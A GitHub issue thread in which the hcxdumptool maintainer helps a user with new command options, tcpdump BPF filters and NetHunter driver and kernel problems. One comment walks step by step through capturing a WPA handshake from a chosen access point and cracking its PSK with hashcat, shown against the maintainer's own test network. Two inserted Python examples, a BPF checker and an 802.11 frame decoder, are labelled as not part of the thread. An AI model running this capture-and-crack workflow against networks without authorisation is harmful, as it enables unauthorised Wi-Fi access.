hcxdumptool new style #355

Closed

axeldog opened this issue Oct 23, 2023 · 114 comments

Comments

@axeldog

axeldog commented Oct 23, 2023

Need help with hcxdumptool on nethunter. When running the command "hcxdumptool -i wlan0 -w pmkid.pcapng" it runs and pumps in pmkid.pcapng, but if I add anything more to the command, like --filterlist_ap=my filter.txt --filternode=3 or --enable_status=1, it throws "2 errors during run time" "failed to arm interface".

@ZerBea
Owner

ZerBea commented Oct 23, 2023

These options (--filterlist_ap=my filter.txt --filternode=3 or --enable_status=1) have been removed since v6.3.0.
From now on, it is mandatory to add a Berkeley Packet Filter (BPF) that does the entire filtering.

More information is here:
#343
#330

as well as here:
$ hcxdumptool --help

and in changelog:
https://github.com/ZerBea/hcxdumptool/blob/master/changelog#L83

Closing this report here, because these changes are wanted and announced.

@ZerBea ZerBea closed this as completed Oct 23, 2023
@ZerBea
Owner

ZerBea commented Oct 23, 2023

Option "enable_status=1" has been replaced by "rds=1" and the slow waterfall display has been replaced by a fast split screen.
Options "filterlist_ap=my filter.txt" and "filternode=3" have been replaced by "bpf=filter.bpfc".
How to build the Berkeley Packet Filter is explained in the help.

@ZerBea
Owner

ZerBea commented Oct 23, 2023

A typical command line (scan all frequencies supported by the interface) is
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F

In case of filtering:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F --bpf=filter.bpf

In case of using a single channel, e.g. channel 1:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -c 1a

Scan only the main channels 1, 6 and 11 on the 2.4GHz band:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1

Or any other combination of the new options.
Please take a look at help to get an overview of all options and the legend of the new split screen.

@ZerBea ZerBea changed the title Hcxdumptool on nethunter Hcxdumptool new style Oct 24, 2023
@ZerBea ZerBea changed the title Hcxdumptool new style hcxdumptool new style Oct 24, 2023
@axeldog
Author

axeldog commented Oct 24, 2023

Quick follow-up question. On nethunter and kalilinux PC, any command with a "--" before it throws "unrecognised option", for example --disable_deauthentication or --do_rcascan.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

This option "--do_rcascan" has been replaced by "--rcascan=active".
If you don't change that, you'll get an ERROR:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --do_rcascan
hcxdumptool: unrecognized option '--do_rcascan'
hcxdumptool 6.3.1-69-g532cc54 (C) 2023 by ZeroBeat
usage: hcxdumptool -h for help

Running the new style, everything should be fine:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active

Requesting physical interface capabilities. This may take some time.
Please be patient...

or to scan all frequencies:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active -F

Requesting physical interface capabilities. This may take some time.
Please be patient...

@axeldog
Author

axeldog commented Oct 24, 2023

Also attack.bpf is empty. Using the commands hcxdumptool -m wlan0 and
tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf writes an empty file.

@axeldog
Author

axeldog commented Oct 24, 2023

Has the man page not been updated yet?

@ZerBea
Owner

ZerBea commented Oct 24, 2023

Command line is wrong.
Your command line:

$ sudo tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf
tcpdump: can't parse filter expression: syntax error

Correct command line:

$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf

$ cat attack.bpf
16
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 5 0 4
64 0 0 18
21 0 3 1762152635
72 0 0 16
21 0 1 4428
6 0 0 262144
6 0 0 0
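Added example (not part of the thread and not code from hcxdumptool or tcpdump): a small Python checker for the `-ddd` text format that hcxdumptool's --bpf option consumes. It parses the count line and the "code jt jf k" lines, disassembles them in the style of tcpdump -d, and flags two of the structural faults the kernel's filter checker rejects (a jump that leaves the program, or a last instruction that is not ret). An empty or truncated attack.bpf, the problem reported a few comments above, raises a ValueError instead of silently yielding a zero-length program. The embedded sample is the exact program quoted above; the two jeq constants 0x114c and 0x690850bb are the BSSID bytes 11:4C and 69:08:50:BB read at offsets 16 and 18 past the radiotap header, which is where addr3 sits in the MAC header.

```python
"""Check and disassemble a classic BPF program saved with `tcpdump ... -ddd`.

Format read by hcxdumptool --bpf: one line with the instruction count,
then one line per instruction holding the four fields "code jt jf k".
"""
import sys

# Field masks of the classic BPF opcode byte (as defined in <linux/filter.h>).
BPF_CLASS, BPF_SIZE, BPF_MODE = 0x07, 0x18, 0xe0
BPF_OP, BPF_SRC, BPF_RVAL, BPF_MISCOP = 0xf0, 0x08, 0x18, 0xf8
SIZE = {0x00: "", 0x08: "h", 0x10: "b"}          # 32-bit word, halfword, byte
ALU = {0x00: "add", 0x10: "sub", 0x20: "mul", 0x30: "div", 0x40: "or", 0x50: "and",
       0x60: "lsh", 0x70: "rsh", 0x80: "neg", 0x90: "mod", 0xa0: "xor"}
JMP = {0x00: "ja", 0x10: "jeq", 0x20: "jgt", 0x30: "jge", 0x40: "jset"}

# Sample input: the program quoted in this thread for
# `tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd`.
SAMPLE_DDD = """16
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 5 0 4
64 0 0 18
21 0 3 1762152635
72 0 0 16
21 0 1 4428
6 0 0 262144
6 0 0 0
"""


def parse_ddd(text):
    """Parse -ddd text into (code, jt, jf, k) tuples; raise ValueError when malformed."""
    lines = [ln.split() for ln in text.splitlines() if ln.strip()]
    if not lines:
        raise ValueError("empty filter file: tcpdump wrote nothing, check its error output")
    try:
        count = int(lines[0][0])
        prog = [tuple(int(f) for f in fields) for fields in lines[1:]]
    except ValueError:
        raise ValueError("filter file contains a non-numeric field") from None
    if any(len(ins) != 4 for ins in prog):
        raise ValueError("every instruction line must hold exactly four integers")
    if count != len(prog):
        raise ValueError(f"header announces {count} instructions but file holds {len(prog)}")
    return prog


def disassemble_one(pc, ins):
    """Render one instruction in tcpdump -d style; jump targets are absolute."""
    code, jt, jf, k = ins
    cls = code & BPF_CLASS
    if cls in (0x00, 0x01):                           # ld / ldx
        operand = {0x00: f"#{k:#x}", 0x20: f"[{k}]", 0x40: f"[x + {k}]", 0x60: f"M[{k}]",
                   0x80: "#pktlen", 0xa0: f"4*([{k}]&0xf)"}.get(code & BPF_MODE, "?")
        return f"{'ld' if cls == 0 else 'ldx'}{SIZE.get(code & BPF_SIZE, '?')} {operand}"
    if cls in (0x02, 0x03):                           # st / stx into scratch memory
        return f"{'st' if cls == 2 else 'stx'} M[{k}]"
    src = "x" if code & BPF_SRC else f"#{k:#x}"
    if cls == 0x04:                                   # alu
        op = ALU.get(code & BPF_OP, "?")
        return op if op == "neg" else f"{op} {src}"
    if cls == 0x05:                                   # jmp
        op = JMP.get(code & BPF_OP, "?")
        if op == "ja":
            return f"ja {pc + 1 + k}"
        return f"{op} {src} jt {pc + 1 + jt} jf {pc + 1 + jf}"
    if cls == 0x06:                                   # ret
        return "ret a" if code & BPF_RVAL == 0x10 else f"ret #{k}"
    return {0x00: "tax", 0x80: "txa"}.get(code & BPF_MISCOP, "?")


def disassemble(prog):
    return [f"({pc:03d}) {disassemble_one(pc, ins)}" for pc, ins in enumerate(prog)]


def validate(prog):
    """Return structural problems (the kernel's checker refuses such programs); [] means well-formed."""
    if not prog:
        return ["program has no instructions"]
    problems = []
    if prog[-1][0] & BPF_CLASS != 0x06:
        problems.append("last instruction is not ret, execution could run off the end")
    for pc, (code, jt, jf, k) in enumerate(prog):
        if code & BPF_CLASS != 0x05:
            continue
        targets = [pc + 1 + k] if code & BPF_OP == 0x00 else [pc + 1 + jt, pc + 1 + jf]
        for t in targets:
            if t >= len(prog):
                problems.append(f"instruction {pc}: jump target {t} lies outside the program")
    return problems


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DDD
    program = parse_ddd(text)
    for line in disassemble(program):
        print(line)
    for problem in validate(program):
        print("PROBLEM:", problem)
```

Run it with a path argument to inspect your own filter file, or with no argument to walk through the embedded sample. The `and #0xc` / `jeq #0x4` pair at instructions 8 and 9 is how libpcap's `wlan addr3` primitive skips control frames, which have no addr3 field; that is also why a capture taken with this filter contains no ACK or RTS/CTS frames.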

@ZerBea
Owner

ZerBea commented Oct 24, 2023

The default man page of hcxdumptool points to "--help":
https://github.com/ZerBea/hcxdumptool/blob/master/man/hcxdumptool.1
It doesn't need an update.

If your manpage is different, it was not created by me.

@axeldog
Author

axeldog commented Oct 24, 2023

Sorry, in the command line I do add "addr1".
Also "man hcxdumptool" brings a whole new list of commands.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

Not my manpage.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

Arch Linux doesn't need a manpage (like Debian). So it is not installed by default and the Makefile doesn't have an entry to install this manpage.
https://github.com/ZerBea/hcxdumptool/blob/master/Makefile

Maybe you have an old manpage (if you have not uninstalled the old version before you installed the new version) or a manpage created by a package maintainer.

@axeldog
Author

axeldog commented Oct 24, 2023

Ahhh, so confusing lol.
New error.
tcpdump: ethernet address used in non-ether expression. After trying to make the bpf file.

@axeldog
Author

axeldog commented Oct 24, 2023

Forget last. My mistake.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

tcpdump will show this error if the interface is not in monitor mode and not up.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

If the target AP is not on channel 1a, 6a or 11a, don't forget to set the operation channel of the AP by option "-c" or scan all frequencies by option "-F".
Default scan is 1a, 6a and 11a, only.

@axeldog
Author

axeldog commented Oct 24, 2023

I didn't insert wlan before addr3, just -I wlan0 addr3.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

Ok

@axeldog
Author

axeldog commented Oct 24, 2023

My channel is 11, so "-c 11a" is for 2.4GHz.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

Please also notice that running this filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf

You'll get a warning (missing frames) by hcxpcapngtool when converting the dump file to hc22000 format because undirected proberequest frames are filtered out, too.

To avoid that, add a BROADCAST MAC to your filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf

Additionally, you can tell hcxdumptool to terminate once you got a PMKID or a handshake:

--exitoneapol=<type>           : exit on first EAPOL occurrence:
                                  bitmask:
                                   1 = PMKID
                                   2 = EAPOL M2
                                   4 = EAPOL M3

@axeldog
Author

axeldog commented Oct 24, 2023

Would this adapter work: Alfa Network AWUS036AC Long-Range Dual-Band, chipset RTL8812AU, both bands?
Is there a difference between addr1 and addr3?

@ZerBea
Owner

ZerBea commented Oct 24, 2023

The RTL8812AU driver is not part of the stock Linux kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/net/wireless/realtek?h=v6.5.8
and you need to install a third party driver.

Please read the adapter section of README.md (recommended and not recommended chipsets/drivers).

Please also read this:
morrownr/USB-WiFi#314

There is a difference between addr1, addr2, addr3 and addr4:

addr1 = to
addr2 = from
addr3 = BSSID
addr4 = wireless distribution system

https://www.geeksforgeeks.org/ieee-802-11-mac-frame/
https://www.rfwireless-world.com/Articles/WLAN-MAC-layer-protocol.html
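Added example (not the project's code and not posted by either participant) that works through the address-field explanation above and the broadcast-MAC advice a few comments earlier. It decodes the radiotap and 802.11 MAC headers of constructed sample frames, assigns each addr field its role using the general 802.11 address table (this goes beyond the short list above: for data frames the BSSID moves between addr1, addr2 and addr3 depending on the To DS/From DS bits, and control frames carry no BSSID at all), and emulates the thread's `wlan addr3` filter to show which frames it keeps. The AP address 11:4C:69:08:50:BB and the client 00:e6:2d:02:19:87 are taken from the thread; the frame bytes and the minimal 8-byte radiotap header are constructed.

```python
"""Decode the address fields of 802.11 frames from a radiotap capture and
emulate a `wlan addr3 ...` filter on them."""
import struct

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}
CONTROL_WITH_TA = {8, 9, 10, 11, 14, 15}     # BlockAckReq, BlockAck, PS-Poll, RTS, CF-End(+Ack)

# Address roles of data frames by (To DS, From DS), from the 802.11 address field table.
DATA_ROLES = {
    (False, False): {"addr1": "DA", "addr2": "SA", "addr3": "BSSID"},
    (False, True):  {"addr1": "DA", "addr2": "BSSID", "addr3": "SA"},
    (True, False):  {"addr1": "BSSID", "addr2": "SA", "addr3": "DA"},
    (True, True):   {"addr1": "RA", "addr2": "TA", "addr3": "DA", "addr4": "SA"},
}


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def strip_radiotap(pkt):
    """Drop the radiotap header (DLT_IEEE802_11_RADIO); its length is little-endian at bytes 2-3."""
    if len(pkt) < 4 or pkt[0] != 0:
        raise ValueError("not a radiotap version-0 header")
    rt_len = struct.unpack_from("<H", pkt, 2)[0]
    if rt_len > len(pkt):
        raise ValueError("radiotap length exceeds packet length")
    return pkt[rt_len:]


def parse_header(frame):
    """Decode frame control and the address fields present in an 802.11 MAC header."""
    if len(frame) < 10:
        raise ValueError("shorter than the smallest control-frame header")
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    hdr = {"type": FRAME_TYPES[ftype], "subtype": subtype,
           "to_ds": bool(fc1 & 0x01), "from_ds": bool(fc1 & 0x02),
           "addr1": mac_str(frame[4:10])}
    if ftype == 1:                                    # control: RA, sometimes TA, never addr3
        if subtype in CONTROL_WITH_TA and len(frame) >= 16:
            hdr["addr2"] = mac_str(frame[10:16])
        return hdr
    if len(frame) < 24:
        raise ValueError("truncated management/data header")
    hdr["addr2"], hdr["addr3"] = mac_str(frame[10:16]), mac_str(frame[16:22])
    if hdr["to_ds"] and hdr["from_ds"]:               # 4-address (WDS) frame
        if len(frame) < 30:
            raise ValueError("truncated 4-address header")
        hdr["addr4"] = mac_str(frame[24:30])
    return hdr


def roles(hdr):
    """Map the address fields that are present to DA/SA/BSSID/RA/TA."""
    if hdr["type"] == "management":
        return {"addr1": "DA", "addr2": "SA", "addr3": "BSSID"}
    if hdr["type"] == "data":
        return DATA_ROLES[(hdr["to_ds"], hdr["from_ds"])]
    return {f: r for f, r in (("addr1", "RA"), ("addr2", "TA")) if f in hdr}


def bssid(hdr):
    """BSSID of the frame, or None where no field carries it (control and WDS frames)."""
    return next((hdr[f] for f, r in roles(hdr).items() if r == "BSSID"), None)


def addr3_matches(pkt, *macs):
    """Emulate the thread's `wlan addr3 A [or wlan addr3 B]` filter on one captured packet."""
    hdr = parse_header(strip_radiotap(pkt))
    return hdr.get("addr3") in {m.lower() for m in macs}


# Constructed sample frames (duration and sequence control zeroed, no FCS).
RADIOTAP = bytes.fromhex("0000080000000000")       # version 0, length 8, no present fields
AP = bytes.fromhex("114c690850bb")                   # AP address used in this thread's filter
CLIENT = bytes.fromhex("00e62d021987")               # client address from the thread's screen
BCAST = b"\xff" * 6


def build(fc0, fc1, a1, a2, a3=b"", a4=b""):
    body = bytes([fc0, fc1]) + b"\x00\x00" + a1 + a2
    if a3:
        body += a3 + b"\x00\x00" + a4
    return RADIOTAP + body


BEACON = build(0x80, 0x00, BCAST, AP, AP)             # management subtype 8, BSSID in addr3
PROBE_REQ = build(0x40, 0x00, BCAST, CLIENT, BCAST)   # undirected probe request: addr3 = broadcast
EAPOL_FROM_AP = build(0x08, 0x02, CLIENT, AP, AP)     # data, From DS: addr2 = BSSID, addr3 = SA (the AP)
ACK = build(0xd4, 0x00, CLIENT, b"")                  # control subtype 13: RA only, no addr3

if __name__ == "__main__":
    for name, pkt in (("beacon", BEACON), ("probe-req", PROBE_REQ),
                      ("eapol", EAPOL_FROM_AP), ("ack", ACK)):
        hdr = parse_header(strip_radiotap(pkt))
        print(f"{name:10s} {hdr['type']:10s} bssid={bssid(hdr)} "
              f"addr3-filter={addr3_matches(pkt, '11:4C:69:08:50:BB')} roles={roles(hdr)}")
```

Beacons and the AP's own handshake frames keep the AP address in addr3, so the single-address filter retains what hcxpcapngtool needs for the hash; an undirected probe request carries ff:ff:ff:ff:ff:ff in addr3 and only passes once the broadcast MAC is OR'ed into the filter, which is the "missing frames" warning from the comment above in miniature. Control frames never match either way, because they have no addr3 to compare.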

@axeldog
Author

axeldog commented Oct 24, 2023

You're a legend, thanks so much for your help. Is there a dual band adapter you would recommend? Currently using the TP-Link TL-WN722N 2.4GHz.

@axeldog
Author

axeldog commented Oct 24, 2023

Are there any other solutions to single out a specific AP to attack? This doesn't seem to work like you said.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

ALFA AWUS036ACM
ALFA AWUS036ACHM
Both drivers are well maintained and part of the Linux kernel.
Both support active monitor mode.

Give me a few minutes to run a test.

@ZerBea
Owner

ZerBea commented Oct 24, 2023

here we go:
TP-Link TL-WN722N v1:

$ lsusb
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n

build filter:

$ sudo hcxdumptool -m wlp48s0f4u2u4
$ sudo tcpdump -i wlp48s0f4u2u4 wlan addr3 08:96:d7:98:e1:9e -ddd > attack.bpf

For this test we do not need frames addressed to BROADCAST MAC and they are filtered out.

run attack against target test AP:

$ sudo hcxdumptool -i wlp48s0f4u2u4 --rds=1 -w tlwn722v1.pcapng -c 10a --bpf=attack.bpf

 CHA    LAST   R 1 3 P S    MAC-AP    ESSID (last EAPOL on top)  SCAN-FREQUENCY:   2457
-----------------------------------------------------------------------------------------
 [ 10] 18:55:06 + + +   + 0896d798e19e AP_7272


   LAST   E 2 MAC-AP-ROGUE   MAC-CLIENT   ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
 18:54:59     0896d798e19e 00e62d021987 AP_7272

282 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
31 EPB written to pcapng dumpfile

exit on sigterm
bye-bye

convert to hc22000 format:

$ hcxpcapngtool -o test.22000 tlwn722v1.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v1.pcapng...

summary capture file
--------------------
file name................................: tlwn722v1.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp48s0f4u2u4
interface vendor.........................: f81a67
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000da76303f4 (incremented on every new client)
MAC CLIENT...............................: c02250d406bb
REPLAYCOUNT..............................: 62460
ANONCE...................................: 4655d441f5e986d1c7102b72799bd537abc7a9c8dc150391bf988a2d0a8db87b
SNONCE...................................: 3c2c9d4853f5cfad58cde9c27e0aef9b0c80899f33e2664a21ea8a04c8df4464
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
duartion of the dump tool (seconds)......: 1
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 31
frames with correct FCS..................: 31
packets received on 2.4 GHz..............: 31
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10 
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 24
EAPOL RSN messages.......................: 24
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 4
EAPOL M1 messages (total)................: 18
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 4
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2457: 31	

Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.

session summary
---------------
processed pcapng files................: 1

hcxpcapngtool has detected the absence of frames addressed to BROADCAST MAC and told us that (missing frames).

Try to recover the PSK:

$ hashcat -m 22000 test.22000 -a 6 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
12e5828236c9a5a54795dde9b2b9d0f1:0896d798e19e:00e62d021987:AP_7272:12345678
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Oct 24 19:01:45 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:01:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       73 H/s (0.42ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 42c Fan:  0% Util: 59% Core:2835MHz Mem:10802MHz Bus:16

Started: Tue Oct 24 19:01:44 2023
Stopped: Tue Oct 24 19:01:46 2023

For this test I configured a very simple PSK 12345678 which was successfully recovered by hashcat.

Conclusion:
It took only 2 seconds to perform the attack:

timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59

The PSK has been successfully recovered.

@ZerBea
Owner

ZerBea commented Oct 29, 2023

You will not be able to compile this outdated driver.

@axeldog
Author

axeldog commented Oct 29, 2023

Best give up then, I guess. Is it safe to assume that the ES File Explorer pic I sent shows compatible drivers, as my tilink driver is there and that worked out of the box with no problems?

@axeldog
Author

axeldog commented Oct 29, 2023

Tplink*

@ZerBea
Owner

ZerBea commented Oct 29, 2023

Installing an out of tree driver isn't easy.
Better to use a device running a stock Linux kernel driver.
I have good reasons to mention that in README.md:

No support for a third party driver which is not part of the official Linux kernel (https://www.kernel.org/)
Report related issues to the site, from which you downloaded the driver

Running third party drivers means that you will run into problems.

@axeldog
Author

axeldog commented Oct 29, 2023

Is there a file with the stock kernel drivers in nethunter?

@ZerBea
Owner

ZerBea commented Oct 29, 2023

Stock drivers means that the driver comes with the Linux kernel:
That is not the case on rtl8812au.
You have to go for a third party driver, e.g.:
$ git clone https://github.com/aircrack-ng/rtl8812au

@axeldog
Author

axeldog commented Oct 29, 2023

That's the same one I've been trying to install.

@ZerBea
Owner

ZerBea commented Oct 29, 2023

First of all you have to fix your configuration problems:
Looks like the kernel header API doesn't match your kernel headers: 4.14 vs 6.5

An example:
I'm on

$ uname -r
6.5.9-arch2-1

So my api headers should be on 6.x:

linux-api-headers 6.4-1
linux-headers 6.5.9.arch2-1

@axeldog
Author

axeldog commented Oct 29, 2023

It matches.
[screenshot attached: 20231029_132437]

@axeldog
Author

axeldog commented Oct 29, 2023

Is there a way to find what drivers came preinstalled with my nethunter kernel?

@ZerBea
Owner

ZerBea commented Oct 29, 2023

$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/

Should give a list like this:

admtek  broadcom  intersil  mediatek   quantenna  rsi     ti
ath     cisco     legacy    microchip  ralink     silabs  virtual
atmel   intel     marvell   purelifi   realtek    st      zydas

and

$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/mediatek

Should show you the MediaTek drivers:
mt76 mt7601u

@axeldog
Author

axeldog commented Oct 29, 2023

Doesn't work.
[screenshot attached: 20231029_134428]

@ZerBea
Owner

ZerBea commented Oct 29, 2023

Can't work, because it is a Linux (only) example.
You have to search for the modules directory of your distribution.

BTW:
It looks like it is not an official KALI nethunter distribution.

@axeldog
Author

axeldog commented Oct 29, 2023

I used the nethunter installer for my phone make and model, so it should be the official one.

@ZerBea
Owner

ZerBea commented Oct 29, 2023

What is the output of uname -r?

@axeldog
Author

axeldog commented Oct 29, 2023

[screenshot attached: 20231029_135227]

@axeldog
Author

axeldog commented Oct 29, 2023

[screenshot attached: 20231029_140355]

@ZerBea
Owner

ZerBea commented Oct 29, 2023

and what is the output of
apt list --installed | grep header

@axeldog
Author

axeldog commented Oct 29, 2023

[screenshot attached: 20231029_144435]

@ZerBea
Owner

ZerBea commented Oct 29, 2023

Configuration error:
KALI rolling release == 6.5
your kernel == 4.14

Headers and kernel do not match.

@axeldog
Author

axeldog commented Oct 29, 2023

So nothing can be done to change it except maybe use nethunter installer to make a new kernel and flash it.

@ZerBea
Owner

ZerBea commented Oct 29, 2023

I don't know how to fix this on KALI nethunter, because I don't know how this happened.
But I've seen this before:
#332 (comment)

@axeldog
Author

axeldog commented Oct 29, 2023

I think I know what happened. When I rooted my phone and flashed nethunter I used David Bombal's video, but the only thing I didn't exactly copy, because I couldn't find it, was the Android version David used. He used OOS 11.0.9.1 and I used 11.0.5.1.
[screenshot attached: 20231029_163000]

@ZerBea
Owner

ZerBea commented Oct 29, 2023

That is possible.
Unfortunately this will cause hcxdumptool to fail, too. It is compiled using 6.x API but it is running on kernel 4.14.

@axeldog
Author

axeldog commented Oct 29, 2023

Hcxdumptool was working for the bpf filter mode but that's all I tested. Guess I'm gonna have to wipe and reinstall everything. Will let you know the results.

@ZerBea
Owner

ZerBea commented Oct 29, 2023

Kernel and API should match:

$ uname -r
6.5.9-arch2-1

$ hcxdumptool -v
hcxdumptool 6.3.1-72-gb680a88 (C) 2023 ZeroBeat
compiled by gcc 13.2.1
compiled with Linux API headers 6.4.0
compiled with glibc 2.38

kernel == 6.x and API header == 6.x

@axeldog
Author

axeldog commented Oct 30, 2023

Update. Reinstalled Android and rooted, installed Kali NetHunter and installed a kernel from the nethunter project, and still the cyberknight777 kernel, which I'm pretty sure came from the nethunter installer project.

@ZerBea
Owner

ZerBea commented Oct 30, 2023

It is mandatory to make sure that KALI Linux api header match to your kernel.
If not, you will not be able to compile the driver.

@axeldog
Author

axeldog commented Oct 30, 2023

It's exactly the same as before. I really need help from someone who maintains the nethunter installer project. And I need to find the best way to uninstall nethunter without having to factory reset my phone and start from the beginning every time.
